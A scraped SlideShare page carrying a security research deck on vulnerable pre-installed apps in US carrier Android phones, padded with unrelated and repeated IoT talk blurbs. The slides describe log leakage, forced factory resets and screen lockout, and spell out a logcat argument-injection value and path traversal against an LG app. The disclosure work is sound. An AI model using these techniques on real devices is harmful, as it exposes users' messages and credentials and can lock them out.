Vulnerable Out of the Box: An Evaluation of Android Carrier Devices
This document evaluates vulnerabilities found in various Android devices from major carriers in the US. Several issues were uncovered:
1) Pre-installed apps on many devices could write sensitive user data like text messages, call logs and IMEI/IMSI numbers to external storage or log files that could then be read by other apps.
2) Some devices allowed arbitrary command execution with system privileges or a programmatic factory reset without user interaction due to flaws in pre-installed apps.
3) Certain LG and Asus phones contained bugs where an app could lock the user out of their device or obtain the full system-wide logcat output
The Project is about anti-theft & automation. It also provides protection against gas leakage by notification through sms and internet. Ability to control electrical equipments via internet
Nick Stephens-how does someone unlock your phone with noseGeekPwn Keen
In GeeekPwn2016 Shanghai, Nick built an Android APP, which can exploit the vulnerabilities in THE Android devices with TrustZone. It can execute arbitrary code with root privilege. In the demo, the fingerprint authentication module is pwned and set to allow any fingerprint to pass.
IoT Challenges: Technological, Business and Social aspectsRoberto Minerva
Internet of Things is promising to be a set of technologies able to have a high impact on how people live, produce, modify and interact with the environment. Such a transformation is driven by increasing technologies capabilities of sensors/actuators, communications, general-purpose hardware, availability of software and programmability of devices. The integration of so different technologies is a problem in itself and IoT is also trying to solve cogent issues of specific problem domains, such as e-health, transportation, manufacturing, and so on. Large IoT systems (e.g., smart cities) stand on their own because the smartness requires integration of different technologies, processes and different administrative domains creating the needs to deal with a complex system. In addition to technological and problem domain specific challenges, there exist further challenges that fall in business, social and regulation realms. They can greatly impact the deployment and the success of IoT deployment. The speech aims at providing a view on some major technologies challenges of IoT and to cover a few critical business and social issues that could hamper the large deployment of IoT systems by providing some examples of implementation.
IoT project: best 30 ideas with cloud, raspberry pi, and arduinoMarkMojumdar
When you plan to implement your academic knowledge with a real-life scenario, you need an IoT Project Idea. IoT is the automation and digitization of home appliances, industrial machinery, and everything through the internet and cloud computing. One IoT idea can change your future life. We are here to help you try the 30 best internets of things project new ideas with cloud computing, raspberry pi 3, and Arduino.
Source: www.fossguru.com
The Project is about anti-theft & automation. It also provides protection against gas leakage by notification through sms and internet. Ability to control electrical equipments via internet
Nick Stephens-how does someone unlock your phone with noseGeekPwn Keen
In GeeekPwn2016 Shanghai, Nick built an Android APP, which can exploit the vulnerabilities in THE Android devices with TrustZone. It can execute arbitrary code with root privilege. In the demo, the fingerprint authentication module is pwned and set to allow any fingerprint to pass.
IoT Challenges: Technological, Business and Social aspectsRoberto Minerva
Internet of Things is promising to be a set of technologies able to have a high impact on how people live, produce, modify and interact with the environment. Such a transformation is driven by increasing technologies capabilities of sensors/actuators, communications, general-purpose hardware, availability of software and programmability of devices. The integration of so different technologies is a problem in itself and IoT is also trying to solve cogent issues of specific problem domains, such as e-health, transportation, manufacturing, and so on. Large IoT systems (e.g., smart cities) stand on their own because the smartness requires integration of different technologies, processes and different administrative domains creating the needs to deal with a complex system. In addition to technological and problem domain specific challenges, there exist further challenges that fall in business, social and regulation realms. They can greatly impact the deployment and the success of IoT deployment. The speech aims at providing a view on some major technologies challenges of IoT and to cover a few critical business and social issues that could hamper the large deployment of IoT systems by providing some examples of implementation.
IoT project: best 30 ideas with cloud, raspberry pi, and arduinoMarkMojumdar
When you plan to implement your academic knowledge with a real-life scenario, you need an IoT Project Idea. IoT is the automation and digitization of home appliances, industrial machinery, and everything through the internet and cloud computing. One IoT idea can change your future life. We are here to help you try the 30 best internets of things project new ideas with cloud computing, raspberry pi 3, and Arduino.
Source: www.fossguru.com
This smart garbage monitoring system presentation uses the concept of internet of things. The Architecture & work flow diagram shows the clear picture of implementation of internet of things based garbage bin and we also have mentioned the set of tools required to achieve the same.
How one leading developer of SCADA (Supervisory Control and Data Acquisition) software has applied their knowledge to innovate a powerful IoT (Internet of Things) development platform.
IoT testing and quality assurance indicthreadsIndicThreads
Presented at the IndicThreads.com Software Development Conference 2016 held in Pune, India. More at http://www.IndicThreads.com and http://Pune16.IndicThreads.com
--
1ST DISIM WORKSHOP ON ENGINEERING CYBER-PHYSICAL SYSTEMSHenry Muccini
The University of L'Aquila, Italy, has organized an internal meeting on Engineering Cyber-Physical Systems (26 Jan 2016). About 35 colleagues from the DISIM (Information Engineering, Computer Science, and Mathematics) have participated and made presentations.
This SlideShare collects all the presentations.
If interested to future events, feel free to contact us:
Alessandro D’Innocenzo – alessandro.dinnocenzo@univaq.it -
Henry Muccini - henry.muccini@univaq.it
Building for the Internet of Things: Hardware, Sensors & the CloudNick Landry
Connected, smart devices have become pervasive. These "Things" already outnumber more traditional computing devices and are set to surpass the 100 billion devices mark within a few short years. The Internet of Things (IoT) extends your reach as a software developer into the world of diverse hardware devices controlled by your code, and powered by the cloud. In this session we’ll explore the “Maker” or “Things” side of IoT with hardware boards like Arduino, Raspberry Pi, Netduino, Intel Edison and others, and the various sensors and shields you can use to measure temperatures, capture user input via buttons, display data on micro displays and more fun electronic stuff. We’ll build our first simple electronic circuits using LEDs and push buttons, and then write embedded code to augment that circuit by deploying & running it on various microcontroller boards.
Next, this session extends the reach of your hardware projects by connecting your “things” to the cloud, thus fulfilling the promise of the “Internet of Things”. You'll learn about many of the options available to plug devices into connected intelligent systems, including Ethernet, Wi-Fi, Bluetooth and other custom wireless options. We’ll explore how sensor data from hardware devices from the field can be collected and routed through gateways using Machine-to-Machine (M2M) messaging, and stored in the cloud, where it can be consumed in real-time data visualization dashboards.
The Internet of Things is full of opportunities for developers and this session is your best starting point to understand the big picture, and the possibilities. Don’t fret if you’ve never done anything with hardware or electronics, this session will give you the guidance you need to get started.
This smart garbage monitoring system presentation uses the concept of internet of things. The Architecture & work flow diagram shows the clear picture of implementation of internet of things based garbage bin and we also have mentioned the set of tools required to achieve the same.
How one leading developer of SCADA (Supervisory Control and Data Acquisition) software has applied their knowledge to innovate a powerful IoT (Internet of Things) development platform.
IoT testing and quality assurance indicthreadsIndicThreads
Presented at the IndicThreads.com Software Development Conference 2016 held in Pune, India. More at http://www.IndicThreads.com and http://Pune16.IndicThreads.com
--
1ST DISIM WORKSHOP ON ENGINEERING CYBER-PHYSICAL SYSTEMSHenry Muccini
The University of L'Aquila, Italy, has organized an internal meeting on Engineering Cyber-Physical Systems (26 Jan 2016). About 35 colleagues from the DISIM (Information Engineering, Computer Science, and Mathematics) have participated and made presentations.
This SlideShare collects all the presentations.
If interested to future events, feel free to contact us:
Alessandro D’Innocenzo – alessandro.dinnocenzo@univaq.it -
Henry Muccini - henry.muccini@univaq.it
Building for the Internet of Things: Hardware, Sensors & the CloudNick Landry
Connected, smart devices have become pervasive. These "Things" already outnumber more traditional computing devices and are set to surpass the 100 billion devices mark within a few short years. The Internet of Things (IoT) extends your reach as a software developer into the world of diverse hardware devices controlled by your code, and powered by the cloud. In this session we’ll explore the “Maker” or “Things” side of IoT with hardware boards like Arduino, Raspberry Pi, Netduino, Intel Edison and others, and the various sensors and shields you can use to measure temperatures, capture user input via buttons, display data on micro displays and more fun electronic stuff. We’ll build our first simple electronic circuits using LEDs and push buttons, and then write embedded code to augment that circuit by deploying & running it on various microcontroller boards.
Next, this session extends the reach of your hardware projects by connecting your “things” to the cloud, thus fulfilling the promise of the “Internet of Things”. You'll learn about many of the options available to plug devices into connected intelligent systems, including Ethernet, Wi-Fi, Bluetooth and other custom wireless options. We’ll explore how sensor data from hardware devices from the field can be collected and routed through gateways using Machine-to-Machine (M2M) messaging, and stored in the cloud, where it can be consumed in real-time data visualization dashboards.
The Internet of Things is full of opportunities for developers and this session is your best starting point to understand the big picture, and the possibilities. Don’t fret if you’ve never done anything with hardware or electronics, this session will give you the guidance you need to get started.
https://social.samsunginter.net/web/statuses/101091908485239453# #Cdl2018 : #WebThing using #WebThingIotJs on #TizenRT on #ARTIK05x connected to @MozillaIot featuring @The_Jst #JerryScript + #IotJs , video to be published by @CapitoleDuLibre
webthing-iotjs-tizenrt-cdl2018-20181117rzr
Build "Privacy by design" Webthings
With IoT.js on TizenRT and more
#MozFest, Privacy and Security track
Ravensbourne University, London UK <2018-10-27>
How to Introduce Telemetry Streaming (gNMI) in Your Network with SNMP with Te...InfluxData
How to Introduce Telemetry Streaming (gNMI) in Your Network with SNMP with Telegraf
Network to Code, LLC is a network automation solution provider that helps companies transform the way their networks are deployed, managed, and consumed on a day-to-day basis by leveraging network automation, software development, and DevOps technologies and principles. They provide highly sought-after training and consulting services that integrate and deploy network automation technology solutions to improve reliability, security, efficiency, time to market, and customer satisfaction while reducing operational costs.
In this session Josh VanDeraa and David Flores from Network to Code will present how to monitor your network devices with Telegraf using both the SNMP and the gNMI input plugins. They will also present what the challenges are with ingesting the same type of data from different sources and how to remediate that by normalizing the data in Telegraf using processors.
Infocyte - Digital Forensics and Incident Response (DFIR) Training SessionInfocyte
Join Infocyte co-founder and Chief Product Officer, Chris Gerritz, for a two-hour digital forensics and incident response (DFIR) training session.
During this presentation, Chris shows participants how to set up Infocyte's managed detection and response (MDR) platform and how to leverage Infocyte to detect, investigate, isolate, and eliminate sophisticated cyber threats. Additionally, Infocyte helps enterprise cyber security teams eliminate hidden IT risks, improve security hygiene, maintain compliance, and streamline security operations—including improving the capabilities of existing endpoint security tools.
Using Infocyte's new extensions, participants are encouraged to custom create their own collection (detection and analysis) and action (incident response) extensions.
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
With malware becoming more prevalent, and the pool of capable reversers falling short of overall need, there is a greater need to provide quick and efficient malware analysis for network defense. While many analysts have a grasp on how to appropriately reverse malware, there is large room for improvement by extracting critical indicators, correlating on key details, and cataloging artifacts in a way to improve your corporate response for the next attack. This talk will cover beyond the basics of malware analysis and focus on critical indicators that should analysts should focus on for attribution and better reporting.
Leveraging the strength of OSGi to deliver a convergent IoT Ecosystem - O Log...mfrancis
The “internet of things” is the next revolutionary wave following profound changes brought to us by Personal Computers (connecting places) and Mobile Phones (connecting people on the go). This third wave heralds the beginning of the new era of pervasive connectivity, embedded intelligence, and application convergence. It will be the world where smart things will communicate among themselves and with us enabling greener, more efficient, and at the same time more comfortable environment.
This talk will present a platform and products designed to serve the new markets enabled by the Internet of Things, with a particular focus on the value of the OSGi framework enabling convergence of Home Automation, Smart Energy, Electric Vehicle Charging, and e-health on a single remotely manageable platform. It will also provide insights on how the platform was developed leveraging the extensibility offered by the OSGi framework and ProSyst’s modular architecture.
The built-in OSGi stack provides Java-level abstraction of the network interfaces and Smart Energy Profile 2.0 stack as well as cloud integration features such as web server, web services and standards-based remote management. The OSGi framework is the key enabler of the product lifecycle and remote application management mandatory for service provider driven deployments. The Smart Energy 2.0 standard is a key element of the future smart grid. And the work presented in this talk describes the first platform integrating the SEP 2.0 protocol stack with an OSGi based middleware. The OSGi based solution also provides higher level of device security through the use of secure element. The UDK-21 is build around a System-on-Chip STreamPlug (ST2100), the solution features a fully integrated HomePlug PHY/MAC and Analog Front End combined with the ARM926EJ-S processor and a rich set of interfaces.
A demo showing Smart Energy Profile 2.0 use cases will outline these features. The demo will show how web based applications can interact with the OSGi stack on the already publicly available UDK-21 based gateway to control remote devices, such as a thermostat or an electric load. The access to SEP 2.0 devices will be done by the means of JSON-RPC based APIs, independent of the underlying device protocol, hence highlighting the benefits of a generic protocol agnostic architecture from the application standpoint. Other examples of the products that can be built around UDK-21 include Electric Vehicle Charger, Smart Meter, and a Basement Sensor Hub.
Android Industrial Mobility - Droidcon Italy - Turin 9-10 April 2015Pietro F. Maggi
Android Industrial Mobility
BEST PRACTICES TO USE NEW TECHNOLOGIES TO SOLVE OLD PROBLEMS
Large retailers were already using mobile computers with barcode scanners and Wireless networks in the 80s. During the last 30 years they have used custom HW running different versions of DOS, PalmOS, PocketPC,Windows CE,Windows Mobile and Windows Embedded Handheld on Rugged PDAs and Smartphones.
Now it's time to migrate to someting new, to Android.
In this talk I will present what are the biggest surprises that these old time mobility users are going to face and how we can help them to embrace, extend and enjoy the power of Android.
To Android developers and entrepreneurs this talk will explain what are the best practices that the Industrial Mobility field has collected over 30 years of history:
- Think about deployment at design stage
- IT Friendly is as important as User Friendly
- Why a solution that is good for the consumer market is not good enough for Industrial Mobility.
- Acknowledge that your solution is going to survive some generations of Mobile devices (and maybe OSes)
Similar to Vulnerable Out of the Box: An Evaluation of Android Carrier Devices (20)
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
Key Discussion Pointers:
1. Introduction to Data Privacy
- What is data privacy
- Privacy laws around the globe
- DPDPA Journey
2. Understanding the New Indian DPDPA 2023
- Objectives
- Principles of DPDPA
- Applicability
- Rights & Duties of Individuals
- Principals
- Legal implications/penalties
3. A practical approach to DPDPA compliance
- Personal data Inventory
- DPIA
- Risk treatment
It covers popular IaaS/PaaS attack vectors, list them, and map to other relevant projects such as STRIDE & MITRE. Security professionals can better understand what are the common attack vectors that are utilized in attacks, examples for previous events, and where they should focus their controls and security efforts.
Discuss Security Incidents & Business Use Case, Understanding Web 3 Pros
and Web 3 Cons. Prevention mechanism and how to make sure that it doesn’t happen to you?
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
Round Table Discussion On "Emerging New Threats And Top CISO Priorities In 2022"_ Bangalore
Date - 28 September, 2022. Decision Makers of different organizations joined this discussion and spoke on New Threats & Top CISO Priorities
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
Cloud Security Groups are the firewalls of the cloud. They are built-in and provide basic access control functionality as part of the shared responsibility model. However, Cloud Security Groups do not provide the same protection or functionality that enterprises have come to expect with on-premises deployments. In this talk we will discuss the top cloud risks in 2020, why perimeters are a concept of the past and how in the world of no perimitiers do Cloud Security groups, the "Cloud FIrewalls", fit it. We will practically explore Cloud Security Group limitations across different cloud setups from a single vNet to multi-cloud
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
The Internet is home to seemingly infinite amounts of confidential and personal information. As a result of this mass storage of information, the system needs to be constantly updated and enforced to prevent hackers from retrieving such valuable and sensitive data. This increasing number of cyber-attacks has led to an increasing importance of Ethical Hacking. So Ethical hackers' job is to scan vulnerabilities and to find potential threats on a computer or networks. An ethical hacker finds the weakness or loopholes in a computer, web applications or network and reports them to the organization. It requires a thorough knowledge of Networks, web servers, computer viruses, SQL (Structured Query Language), cryptography, penetration testing, Attacks etc. In this session, you will learn all about ethical hacking. You will understand the what ethical hacking, Cyber- attacks, Tools and some hands-on demos. This session will also guide you with the various ethical hacking certifications available today.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Vulnerable Out of the Box: An Evaluation of Android Carrier Devices
1. Vulnerable Out of the Box:
An Evaluation of Android Carrier Devices
Ryan Johnson - Kryptowire
Angelos Stavrou - Kryptowire
This work was supported by the Department of Homeland Security (DHS) Science and Technology (S&T) via award to the Critical Infrastructure Resilience Institute (CIRI) Center of Excellence (COE) led by the University of Illinois at Urbana-Champaign (UIUC).
The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of DHS.
2. Why Look for Cyber Threats?
Aggressive data collection
– Exfiltration of sensitive user-data to China (Adups)
– Sensitive data collection (OnePlus 5)
Remote system compromise
– System compromise from insecure network
communications (Ragentek)
User data disclosure due to vendor modifications
– Samsung leaking log data (CVE-2017-7978)
– MediaTek leaking log data (CVE-2016-10135)
Local “root” privilege escalation
– Alcatel A30 (former Amazon Prime Exclusive Device)
– Leagoo P1
– Privileged EngineerMode app (OnePlus 5)
– Android 4.4 devices with a MediaTek chipset
2
3. Pre-installed Apps and Vendor OS Modification
Android devices contain a set of pre-installed apps
– May not be available on Google Play
– Some apps cannot be disabled
– Privileged platform apps
Pre-installed apps can be malicious and/or insecure
– Insecure apps can be locally or remotely exploited
– Malicious apps can provide “backdoor” functionality
and may exfiltrate sensitive user data
Vendors generally modify Google’s official Android
code to provide custom behavior
– (Un)intentionally expose sensitive capabilities
3
Source: https://developer.android.com/guide/platform/index.html
4. App Components
Fundamental functional blocks of an Android app
– Activity
– Broadcast Receiver
– Service
– Content Provider
Declared in the app’s manifest file
May provide accessible entry-points into an app for other apps to exploit by using
intents which are a message-like abstraction for communication within between apps
– Contains Intent-specific fields and potentially embedded data
4
5. Exported App Components
Exported components are accessible to any process on the device
– Regulated by the android:exported and android:permission app component attributes
Android will export components, by default, if the app component does not use the
android:exported attribute and declares at least one intent-filter
5
<service android:name="com.asus.dm.installer.DMInstallerService">
<intent-filter>
<action android:name="com.asus.dm.installer.sync_apk_data"/>
<action android:name="com.asus.dm.installer.startService"/>
<action android:name="com.asus.dm.installer.download_app"/>
<action android:name="com.asus.dm.DMService.app_install_start"/>
<action android:name="com.asus.dm.DMService.app_install_result"/>
<action android:name="com.asus.dm.DMService.registerConnectivity"/>
<action android:name="com.asus.dm.installer.removeService"/>
</intent-filter>
</service>
DMInstallerService
will be exported by default
6. Threat Model
A low-privilege third-party app is installed on the device via app repackaging, phishing,
remote exploit, etc.
– Possibly, the READ_EXTERNAL_STORAGE permission is needed
– A malicious app without malicious permissions
6
7. Android Devices on US Carriers - Vulnerabilities
ZTE Blade Spark (sold by AT&T)
– Write modem and logcat logs to external storage
LG Phoenix 2 (sold by AT&T)
– Write logcat logs to app’s private directory
– Lock user out of their device
Asus ZenFone V Live (sold by Verizon)
– Command execution as system user
– Take and write screenshot to external storage
ZTE Blade Vantage (sold by Verizon)
– Write modem and logcat logs to external storage
Essential Phone (sold by Sprint)
– Programmatic factory reset
Coolpad Defiant (sold by T-Mobile)
– Send, read, and modify text messages
– Programmatic factory reset
– Obtain phone numbers of contacts
T-Mobile Revvl Plus (Coolpad) (sold by T-Mobile)
– Send, read, and modify text messages
– Programmatic factory reset
– Obtain phone numbers of contacts
ZTE ZMAX Pro (sold by T-Mobile)
– Send, read, and modify text messages
– Programmatic factory reset
– Obtain phone numbers of contacts
– Write modem and logcat log to external storage
LG G6 (sold by Multiple Carriers)
– Lock user out of their device
– Get logcat log and kernel logs
ZTE ZMAX Champ (sold by Total Wireless)
– Write modem and logcat logs to external storage
– Programmatic factory reset
– Make device continually crash in recovery mode
7
8. ZTE – Modem Log and Logcat Log
Vulnerability allows any app to access text messages and call data and logcat logs
– Can be activated by any app on the device
– Transparent to the user (no notifications, toast messages, etc.)
Writes to a base directory of /sdcard/sd_logs
– Modem log stored in qmdl format and logcat log in plaintext
Present in all the ZTE devices we examined
– ZTE Blade Spark, ZTE Blade Vantage, ZTE ZMAX Pro, ZTE ZMAX Champ
8
Source: https://www.amazon.com/Unlocked-Fingerprint-Reader-Z971-Desbloqueado/dp/B0748Z1VJ3
9. Sample Data Leaked Through Logcat
Data written to the logcat log by any process
– Login credentials, tokens, etc.
Body of sent and received text messages
Phone number of received and placed calls
GPS Coordinates
Email Addresses
Telephone number
Cell Tower ID
MAC Address
Serial Number
IMEI
IMSI
URLs
9
10. Exposing User Data Through Logcat Logs
Third-party Android apps cannot read the system-wide
logcat log since Android 4.1 due to it containing sensitive
user data
– Can only read the log messages they write
– System-wide log requires READ_LOGS permission
Pre-installed apps can expose log data to other apps
– Generally written to external storage (SD card),
although a app’s private directory is also possible
Any app with the READ_EXTERNAL_STORAGE
permission can read from external storage
(i.e., SD card)
– Contains the user’s pictures, downloads, and arbitrary files
10
Device Carrier
ZTE Blade Spark AT&T
ZTE Blade Vantage Verizon
ZTE ZMAX Pro T-Mobile
ZTE ZMAX Champ Total Wireless
LG G6 Multiple Carriers
LG Phoenix 2 AT&T
Vivo V7 Unlocked
LG X Power Unlocked
LG Q6 Unlocked
Asus ZenFone 3 Max Unlocked
Orbic Wonder Unlocked
14. LG Vulnerabilities
Obtain system-wide logcat log in attacking app’s private directory
– Affects LG G6, LG Q6, LG X Power 2, and LG Phoenix 2
– Generally written to SD card, but using path traversal it
can be written in the attacking app’s private directory
Lock user out of their device
– Affects LG G6, LG Q6, LG X Power 2, and LG Phoenix 2
– Can only make emergency calls
Dump hidden database that contain logcat and kernel
logs to external storage
– Affects LG G6, LG Q6
14
Source: https://www.amazon.com/LG-G6-32-GB-Unlocked-Exclusive/dp/B07D2JL7TS
15. LG – Read System-wide Logcat Log Via Command
Line Argument Injection
Default command the com.lge.gnsslogcat app executes is logcat -v threadtime
-s GpsLocationProvider:V LocationManagerService:V GnssLogService:V
By default it writes the logs to /storage/emulated/0/gnsslog, but it is vulnerable to a
path traversal attack and can be made to write in an app’s private directory (file permission
changes needed)
App allows log tags to be supplied via intent that get :V appended to it which get added to
the end of logcat command, so you can add *:V Hidden to get all log messages
Command line argument injection changes the command to logcat -v threadtime -s
GpsLocationProvider:V LocationManagerService:V GnssLogService:V *:V
Hidden:V
15
16. LG – Lock The User Out of Their Device
Screen lock is unresponsive except for making emergency calls
– Exported broadcast receiver in com.android.systemui app
• Writes two values to the system settings and locks the screen
– Screen lock is active in safe mode
– Can be used for a crypto-less ransomware
– Affects LG G6, LG Q6, LG X Power 2, and LG Phoenix 2
If ADB is enabled prior to the screen lock, a user can remove
the screen lock by sending a particular broadcast intent
– Otherwise, a factory reset is required to recover the device
16
17. Programmatic Factory Reset
A “factory reset” wipes all user data and
apps from the device
Facilitated by privileged pre-installed apps
– Requires a co-located zero-permission app
– Does not require any user intervention
User data and app that are not externally
backed-up is lost during a factory reset
17
Device Carrier
Essential Phone Sprint
Coolpad Defiant T-Mobile
T-Mobile Revvl Plus T-Mobile
ZTE ZMAX Champ Total Wireless
Leagoo Z5C Unlocked
Leagoo P1 Unlocked
Plum Compass Unlocked
Orbic Wonder Unlocked
MXQ TV Box 4.4.2 N/A
19. AndroidManifest.xml file of the com.asus.splendidcommandagent app
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest
xmlns:android="http://schemas.android.com/apk/res/android" android:sharedUserId="android.uid.system"
package="com.asus.splendidcommandagent" platformBuildVersionCode="18" platformBuildVersionName="4.3.1-
1425645">
<uses-permission android:name="android.permission.INTERACT_ACROSS_USERS"/>
<uses-permission android:name="android.permission.MANAGE_USERS"/>
<application android:icon="@drawable/ic_launcher" android:label="@string/app_name"
android:theme="@style/AppTheme">
<service android:exported="true" android:name=".SplendidCommandAgentService"
android:process="com.asus.services">
<intent-filter>
<action android:name="asus.splendid.intent.action.DO_COMMAND"/>
<action android:name="com.asus.splendidcommandagent.ISplendidCommandAgentService"/>
</intent-filter>
</service>
